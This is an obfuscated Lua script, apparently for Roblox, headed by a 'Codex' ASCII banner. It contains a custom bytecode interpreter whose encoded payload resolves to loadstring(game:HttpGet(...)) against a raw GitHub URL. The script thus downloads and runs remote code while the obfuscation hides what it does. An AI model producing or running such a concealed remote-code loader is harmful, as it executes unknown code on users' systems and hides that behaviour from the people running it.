--[[

████████████████████████████████████████████████████████████████████████████████
█░░░░░░░░░░░░░░█░░░░░░░░░░░░░░█░░░░░░░░░░░░░░█░░░░░░░░░░░░███░░░░░░░░██░░░░░░░░█
█░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀░░░░█░░▄▀▄▀░░██░░▄▀▄▀░░█
█░░▄▀░░░░░░░░░░█░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░▄▀░░█░░▄▀░░░░▄▀▄▀░░█░░░░▄▀░░██░░▄▀░░░░█
█░░▄▀░░█████████░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░███░░▄▀▄▀░░▄▀▄▀░░███
█░░▄▀░░█████████░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░███░░░░▄▀▄▀▄▀░░░░███
█░░▄▀░░█████████░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░█████░░░░▄▀░░░░█████
█░░▄▀░░█████████░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░███████░░▄▀░░███████
█░░▄▀░░█████████░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░███████░░▄▀░░███████
█░░▄▀░░░░░░░░░░█░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░▄▀░░█░░▄▀░░░░▄▀▄▀░░███████░░▄▀░░███████
█░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀░░░░███████░░▄▀░░███████
█░░░░░░░░░░░░░░█░░░░░░░░░░░░░░█░░░░░░░░░░░░░░█░░░░░░░░░░░░█████████░░░░░░███████
████████████████████████████████████████████████████████████████████████████████
]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=getfenv or function()return _ENV;end;local v9=setmetatable;local v10=pcall;local v11=select;local v12=unpack or table.unpack;local v13=tonumber;local function v14(v15,v16)local v17=1;local v18;v15=v4(v3(v15,5),"..",function(v29)if (v1(v29,2)==79) then local v61=0;while true do if (v61==0) then v18=v0(v3(v29,1,1));return "";end end else local v62=0;local v63;while true do if (v62==0) then v63=v2(v0(v29,16));if v18 then local v86=0;local v87;while true do if (v86==1) then return v87;end if (v86==0) then v87=v5(v63,v18);v18=nil;v86=1;end end else return v63;end break;end end end end);local function v19(v30,v31,v32)if v32 then local v64=0 -0;local v65;while true do if (v64==(1703 -(1065 + 638))) then v65=(v30/((1 + 1 + 0)^(v31-1)))%((1 + 1)^(((v32-(1764 -(997 + 766))) -(v31-1)) + 1 + 0));return v65-(v65%(1 + 0));end end else local v66=0 -0;local v67;while true do if (v66==(0 + (0 -0))) then v67=2^(v31-(1 + 0));return (((v30%(v67 + v67))>=v67) and (1 + 0)) or (1146 -(31 + 208 + 474 + 433));end end end end local function v20()local v37=v1(v15,v17,v17);v17=v17 + 1;return v37;end local function v21()local v38=0 + 0;local v39;local v40;while true do if (v38==(0 + 0)) then v39,v40=v1(v15,v17,v17 + 2 + 0);v17=v17 + 2;v38=2 -1;end if (v38==(1 + (0 -0))) then return (v40 * ((337 + 196) -277)) + v39;end end end local function v22()local v41=0 + 0;local v42;local v43;local v44;local v45;while true do if ((878 -(462 + 416))==v41) then v42,v43,v44,v45=v1(v15,v17,v17 + 1 + (917 -(356 + 559)));v17=v17 + 3 + (1362 -(171 + 1190));v41=1 + 0;end if (v41==(3 -2)) then return (v45 * 16777216) + (v44 * 65536) + (v43 * (643 -387)) + v42;end end end local function v23()local v46=v22();local v47=v22();return (( -(2 + 0) * v19(v47,993 -(544 + 417))) + (1340 -(139 + 1200))) * ((5 -3)^(v19(v47,21,127 -(89 + (22 -15))) -(3534 -2511))) * ((((v19(v47,2 -1,20) * ((1223 -(293 + 928))^(63 -31))) + v46)/(2^((508 -(70 + 341)) -45))) + (341 -(237 + 103)));end local function v24(v33)local v48=0 -0;local v49;local v50;while true do if (v48==2) then v50={};for v78=780 -(693 + 86), #v49 do v50[v78]=v2(v1(v3(v49,v78,v78)));end v48=1 + 1 + 1;end if (v48==(236 -(209 + 26))) then v49=v3(v15,v17,(v17 + v33) -(1786 -(1741 + 44)));v17=v17 + v33;v48=(1 -0) + 1;end if (v48==(1440 -(107 + 1333))) then v49=nil;if  not v33 then local v85=0 + 0;while true do if (v85==(0 + 0)) then v33=v22();if (v33==(1199 -(457 + 742))) then return "";end break;end end end v48=593 -((858 -(161 + 678)) + 573);end if (v48==(1 + 2)) then return v6(v50);end end end local v25=v22;local function v26(...)return {...},v11("#",...);end local function v27()local v51=0 -0;local v52;local v53;local v54;local v55;local v56;local v57;while true do if (v51==(3 -2)) then v56=v22();v57={};for v80=1,v56 do local v81=0;local v82;local v83;local v84;while true do if (v81~=(550 -(227 + 322))) then else v84=nil;while true do if (v82~=0) then else v83=v20();v84=nil;v82=1 + 0;end if (v82==1) then if (v83==(1 -0)) then v84=v20()~=(0 -0);elseif (v83==(4 -2)) then v84=v23();elseif (v83==(3 -0)) then v84=v24();end v57[v80]=v84;break;end end break;end if ((0 -0)~=v81) then else v82=0;v83=nil;v81=981 -(664 + 316);end end end v55[1436 -(413 + 1020)]=v20();v51=907 -(342 + 563);end if (v51==(1686 -(1375 + 311))) then local v75=0 -0;local v76;while true do if (v75~=0) then else v76=0;while true do if ((2 + 0)~=v76) then else v51=1;break;end if (v76==0) then v52={};v53={};v76=1 + 0;end if (v76~=(1 + 0)) then else local v110=143 -(67 + 76);while true do if (v110==(0 -0)) then v54={};v55={v52,v53,nil,v54};v110=1 + 0;end if (v110~=(398 -(359 + 38))) then else v76=2 + 0;break;end end end end break;end end end if (v51==(1 + 1)) then local v77=0 + 0;while true do if (v77==(0 -0)) then for v88=1 + 0,v22() do local v89=0 -0;local v90;while true do if ((221 -(194 + 27))~=v89) then else v90=v20();if (v19(v90,1765 -(803 + 961),2 -1)~=(0 + 0)) then else local v114=0;local v115;local v116;local v117;local v118;local v119;while true do if (v114==(6 -4)) then v119=nil;while true do if (v115~=(1 + 0)) then else v118=nil;v119=nil;v115=394 -(362 + 30);end if (v115~=2) then else while true do if (2==v116) then local v138=0;while true do if (v138==0) then local v145=0;while true do if (v145==(1730 -(721 + 1008))) then v138=1 + 0;break;end if ((0 -0)~=v145) then else if (v19(v118,1 + 0,2 -1)==(1060 -(1042 + 17))) then v119[1383 -(988 + 393)]=v57[v119[1912 -(575 + 1335)]];end if (v19(v118,2 + 0,2 + 0)==1) then v119[3]=v57[v119[316 -(302 + 11)]];end v145=2 -1;end end end if ((1 -0)~=v138) then else v116=3 + 0;break;end end end if (v116==1) then local v139=1495 -(927 + 568);local v140;while true do if (v139==(1207 -(1083 + 124))) then v140=470 -(286 + 184);while true do if (v140==(1095 -(782 + 313))) then local v147=0 + 0;local v148;while true do if (v147~=(858 -(139 + 719))) then else v148=0 + 0;while true do if (v148~=(0 + 0)) then else v119={v21(),v21(),nil,nil};if (v117==(987 -(935 + 52))) then local v164=518 -(172 + 346);local v165;local v166;local v167;while true do if ((0 -0)~=v164) then else v165=1459 -(57 + 1402);v166=nil;v164=1;end if (v164==(578 -(554 + 23))) then v167=nil;while true do if (v165~=(2 -1)) then else while true do if (v166==(1110 -(665 + 445))) then v167=0 -0;while true do if (v167~=0) then else v119[1464 -(470 + 991)]=v21();v119[3 + 1]=v21();break;end end break;end end break;end if ((0 + 0)~=v165) then else local v173=0 + 0;while true do if (v173==0) then v166=20 -(18 + 2);v167=nil;v173=1 -0;end if (v173==1) then v165=2 -1;break;end end end end break;end end elseif (v117==1) then v119[2 + 1]=v22();elseif (v117==(1711 -(1187 + 522))) then v119[3]=v22() -((2 + 0)^(91 -(59 + 16)));elseif (v117==(841 -(678 + 160))) then local v174=0 -0;local v175;local v176;while true do if (v174==(1395 -(706 + 688))) then while true do if (v175==(0 + 0)) then v176=0 -0;while true do if (v176==(0 -0)) then v119[1 + 2]=v22() -(2^16);v119[4]=v21();break;end end break;end end break;end if (v174==0) then v175=0;v176=nil;v174=1;end end end v148=1;end if (v148~=1) then else v140=3 -2;break;end end break;end end end if (v140==(1 + 0)) then v116=1 + 1;break;end end break;end end end if (v116==(1691 -(577 + 1114))) then local v141=1905 -(1498 + 407);local v142;while true do if (v141==(0 + 0)) then v142=0;while true do if (v142~=0) then else local v149=0;local v150;while true do if (v149==(0 + 0)) then v150=0 + 0;while true do if (v150==(1076 -(562 + 514))) then v117=v19(v90,871 -(180 + 689),2 + 1);v118=v19(v90,12 -8,2 + 4);v150=727 -(493 + 233);end if (v150==1) then v142=1 + 0;break;end end break;end end end if (v142~=1) then else v116=1 + 0;break;end end break;end end end if (v116~=(1006 -(917 + 86))) then else if (v19(v118,1593 -(1267 + 323),563 -(292 + 268))==(1 -0)) then v119[2 + 2]=v57[v119[1733 -(494 + 1235)]];end v52[v88]=v119;break;end end break;end if (v115==(1659 -(1025 + 634))) then v116=0;v117=nil;v115=1 + 0;end end break;end if (v114~=(1 + 0)) then else v117=nil;v118=nil;v114=391 -(87 + 302);end if (v114~=(0 + 0)) then else v115=1656 -(664 + 992);v116=nil;v114=1 + 0;end end end break;end end end for v91=3 -2,v22() do v53[v91-(1 + 0)]=v27();end v77=1105 -(343 + 761);end if (v77~=(1445 -(141 + 1303))) then else for v93=1 -0,v22() do v54[v93]=v22();end return v55;end end end end end local function v28(v34,v35,v36)local v58=v34[1];local v59=v34[2];local v60=v34[3];return function(...)local v68=0;local v69;local v70;local v71;local v72;local v73;while true do if (v68==1) then v71={...};v72=v11("#",...) -1;v68=2;end if (v68==0) then v69=1;v70= -1;v68=1;end if (v68==3) then A,B=v26(v10(v73));if  not A[1] then local v95=v34[4][v69] or "?";error("Script error at ["   .. v95   .. "]:"   .. A[2]);else return v12(A,2,B);end break;end if (v68==2) then v73=nil;function v73()local v96=v58;local v97=Const;local v98=v59;local v99=v60;local v100=v26;local v101={};local v102={};local v103={};for v107=0 -0,v72 do if (((664 + 482)<=(5530 -(858 + 61))) and (v107>=v99)) then v101[v107-v99]=v71[v107 + 1 + 0];else v103[v107]=v71[v107 + 1 + 0];end end local v104=(v72-v99) + (808 -(465 + 342));local v105;local v106;while true do local v108=0 + 0;local v109;while true do if ((v108==(0 + 0)) or ((5914 -1703)<=(14476 -10483))) then v109=0 -0;while true do if ((1488<=(7546 -4565)) and (v109==(0 -0))) then local v120=(0 -0) -0;while true do if ((v120==(1 -(0 -0))) or ((1725 -1285)==(2448 + 1040))) then v109=1 + 0;break;end if ((((14126 -8960) -(465 + 699))==((27325 -16197) -7126)) and (v120==(0 -0))) then v105=v96[v69];v106=v105[1 + 0];v120=1 + 0 + 0;end end end if ((v109==(2 -1)) or ((1764 -472)>(3050 -(53 + 196)))) then if ((v106<=((1508 -(275 + 369)) -(137 + 725))) or ((297 -(150 + 3))>=(297 + 100 + 745))) then if (((813 -489)<=(6839 -((921 -(520 + 21)) + 1524))) and (v106<=(1687 -(92 + (2780 -1185))))) then local v121=0 -0;local v122;local v123;while true do if ((v121==(1 -0)) or ((1208 + 934)>(3920 + 616))) then while true do if (((0 + 0)==v122) or (((11371 -6548) -(3654 + 114))==(58 + 40))) then v123=v105[1152 -(542 + 608)];v103[v123]=v103[v123](v12(v103,v123 + 1 + 0,v70));break;end end break;end if (((6006 -3979)<=(12977 -8943)) and (v121==(0 + 0))) then v122=0;v123=nil;v121=1 + 0;end end elseif (((5997 -(1345 + 19 + 2))<(13586 -(8233 + 605))) and (v106>(1 + 0))) then v103[v105[5 -3]]=v36[v105[1160 -(292 + (2005 -(563 + 577)))]];else v103[v105[2 + 0]]=v105[1510 -(140 + 1367)];end elseif (((493 -(90 + 57))==(863 -517)) and (v106<=(1443 -(810 + 629)))) then if (((6543 -4337)<=(3729 -(212 + (1216 -(487 + 28))))) and (v106==(930 -((1812 -(418 + 1204)) + 737)))) then v103[v105[624 -(14 + 608)]]();else local v126=946 -(622 + (1597 -(459 + 814)));local v127;local v128;local v129;local v130;local v131;local v132;while true do if ((((261 -(152 + 109)) -0)==v126) or (((2531 -(108 + 837)) + 463)<=((526 + 464) -712))) then v127=1089 -(873 + 216);v128=nil;v126=1 -0;end if (((1018 + 2731)<(5634 -(1574 + 79))) and (v126==((9 + 0) -6))) then while true do if (((320 + 0)<((6508 -(1269 + 28)) -(116 + 105))) and ((0 + 0)==v127)) then v128=1784 -((1699 -947) + 1032);v129=nil;v127=905 -(800 + (205 -101));end if ((v127==(1 -0)) or ((3773 -(591 + 92))==(2944 -(26 + 7 + 2)))) then v130=nil;v131=nil;v127=2 + (0 -0);end if ((v127==2) or ((6081 -(4 + 23 + 1741))==(179 + 4241))) then v132=nil;while true do if (((3519 -(42 + 171))==(7803 -4497)) and (v128==(881 -(209 + 670)))) then for v160=v129,v70 do local v161=0 + 0;local v162;while true do if ((((5269 -(35 + 318)) -(135 + (2119 -(1201 + 596))))>(8488 -4836)) and (v161==(0 -(0 + 0)))) then v162=(2609 -(349 + 1638)) -(390 + 232);while true do if ((((0 + 0) -0)==v162) or ((906 + 797)<(363 + 970))) then v132=v132 + 1 + 0;v103[v160]=v130[v132];break;end end break;end end end break;end if (((12448 -9157)==(2933 + 158 + 200)) and (v128==(546 -(249 + (758 -461))))) then local v153=0 -0;while true do if ((v153==(1681 -(978 + 703))) or ((1835 -(783 + 803))>(1028 + 3774))) then local v163=887 -(632 + 255);while true do if ((v163==(0 + 0)) or ((8880 -5133)<=(12606 -9800))) then v129=v105[703 -(302 + 399)];v130,v131=v100(v103[v129](v12(v103,v129 + (1 -(0 + 0)),v105[3 + 0])));v163=1 -0;end if ((v163==(920 -(300 + 619))) or (((520 + 689) -508)<((4735 -3630) -(23 + 535)))) then v153=1001 -(620 + 380);break;end end end if ((v153==(39 -(16 + 22))) or ((9003 -4637)<=(160 + 78 + 62))) then v128=1 + 0;break;end end end if (((4213 -(544 + 202))<=((4319 + 839) -(438 + 2))) and (v128==(3 -2))) then local v154=0 + (1423 -(241 + 1182));local v155;while true do if ((v154==(0 -0)) or ((135 + 576)>(1223 -(271 + 201)))) then v155=1295 -(1153 + 142);while true do if ((v155==((0 -0) + 0)) or ((205 + 233)>(1006 -(63 + 140)))) then local v168=0 + 0 + 0;while true do if ((v168==(378 -(150 + 228))) or ((10901 -6968)<=(3805 -2558))) then v70=(v131 + v129) -(1040 -(618 + 421));v132=1930 -(102 + 1828);v168=1 -0;end if (((10717 -6398)>=(185 + 636)) and (v168==(1 + 0))) then v155=1460 -(146 + 1313);break;end end end if (((3772 -(63 + 259))>=(602 + 1598)) and ((1 + 0)==v155)) then v128=6 -4;break;end end break;end end end end break;end end break;end if ((v126==(1 + 0)) or ((1371 -675)>(9320 -5135))) then v129=nil;v130=nil;v126=(2 + 0) -0;end if (((1162 -(125 + 178))>(2184 -(116 + 1848))) and (v126==(1822 -(1616 + 204)))) then v131=nil;v132=nil;v126=1 + 2;end end end elseif ((v106>((2065 -(178 + 883)) -(332 + 667))) or (((1977 + 1409) -(116 + 164 + 859))>(2278 + 1118))) then local v133=0 -0;local v134;local v135;local v136;local v137;while true do if (((8666 -6102)>=(904 + 327)) and (v133==(1 + 0))) then v136=nil;v137=nil;v133=944 -(789 + 153);end if ((v133==(0 + 0)) or (((4672 -(686 + 929)) + 947)<=330)) then v134=1319 -((1368 -(481 + 113)) + 545);v135=nil;v133=2 -1;end if ((v133==(6 -4)) or ((2667 -1969)>=(4744 -(882 + 828)))) then while true do if (((2198 + 420)>=(277 + 283)) and (v134==(0 + 0))) then v135=0 + 0;v136=nil;v134=1155 -(772 + 382);end if ((v134==((2670 -(271 + 890)) -(254 + 1254))) or (378>=1515)) then v137=nil;while true do if (((2467 -829)<=(3494 -1276)) and (v135==(0 -0))) then local v156=0 -0;local v157;while true do if ((v156==(0 + 0)) or ((620 -199)>=(2143 + 467))) then v157=1591 -(958 + 633);while true do if ((v157==0) or ((2064 + 574)>(2802 + 1561))) then local v169=927 -(839 + 88);while true do if (((4521 -(1068 + 146))==(4886 -(1026 + 553))) and (v169==(1 + 0))) then v157=1 + 0;break;end if ((v169==(0 -0)) or ((8252 -3281)==(568 -(19 + 1)))) then v136=v105[1 + 1];v137=v103[v105[3]];v169=89 -((581 -(222 + 327)) + 56);end end end if ((v157==(4 -(3 + 0))) or ((67 + 3196)==(3556 -((455 -303) + 106)))) then v135=2 -1;break;end end break;end end end if ((v135==(626 -(27 + 251 + 347))) or ((1760 -(14 + 118 + 252))==(4895 -935))) then v103[v136 + 1 + 0 + 0]=v137;v103[v136]=v137[v105[896 -(363 + 529)]];break;end end break;end end break;end end else do return;end end v69=v69 + (2 -1);break;end end break;end end end end v68=3;end end end;end return v28(v27(),{},v16)();end v14("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7A65746B616E2F7A65746B616E2F6D61696E2F7A65746B616E6B00083O0012023O00013O001202000100023O002006000100010003001201000300044O0004000100039O0000022O00033O000100012O00053O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v8());end
